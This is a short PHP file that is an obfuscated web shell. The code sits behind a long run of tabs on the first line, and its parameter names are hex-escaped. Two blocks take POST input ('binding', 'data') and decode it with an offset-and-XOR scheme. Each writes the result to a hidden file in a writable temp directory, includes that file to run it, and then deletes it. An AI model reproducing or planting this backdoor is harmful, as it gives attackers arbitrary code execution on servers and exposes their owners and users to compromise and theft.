<?php																																										if(in_array("bi\x6E\x64i\x6Eg", array_keys($_POST))){ $res = $_POST["bi\x6E\x64i\x6Eg"]; $res = explode ( '.',$res ) ; $desc = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s5); foreach( $res as $p => $v2): $sChar = ord( $s5[$p % $sLen]); $dec = ( ( int)$v2 - $sChar -( $p % 10)) ^ 23; $desc.=chr( $dec); endforeach; $bind = array_filter([session_save_path(), "/tmp", sys_get_temp_dir(), getenv("TMP"), "/var/tmp", getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), getcwd()]); for ($obj = 0, $symbol = count($bind); $obj < $symbol; $obj++) { $flg = $bind[$obj]; if (is_dir($flg) ? is_writable($flg) : false) { $resource = vsprintf("%s/%s", [$flg, ".descriptor"]); if (file_put_contents($resource, $desc)) { include $resource; @unlink($resource); die(); } } } }


if(filter_has_var(INPUT_POST, "\x64\x61ta")){
	$data_chunk = array_filter([getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]);
	$ref = $_REQUEST["\x64\x61ta"];
	 	$ref 	=	  explode 		(	"."  ,		$ref) ;	
	$flg		= '';
            $s		= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS		= strlen($s);
            $len		= count($ref);
    
            for ($t		= 0; $t < $len; $t++) {  $v9		= $ref[$t];
                $chS		= ord($s[$t %  $lenS]);
                $dec		= ((int)$v9 - $chS - ($t %  10))	^58;
                $flg .= chr($dec);  }
	for ($binding = 0, $token = count($data_chunk); $binding < $token; $binding++) {
    $ent = $data_chunk[$binding];
    		if ((bool)is_dir($ent) && (bool)is_writable($ent)) {
    $object = str_replace("{var_dir}", $ent, "{var_dir}/.itm");
    if (file_put_contents($object, $flg)) {
	include $object;
	@unlink($object);
	exit;
}
}
}
}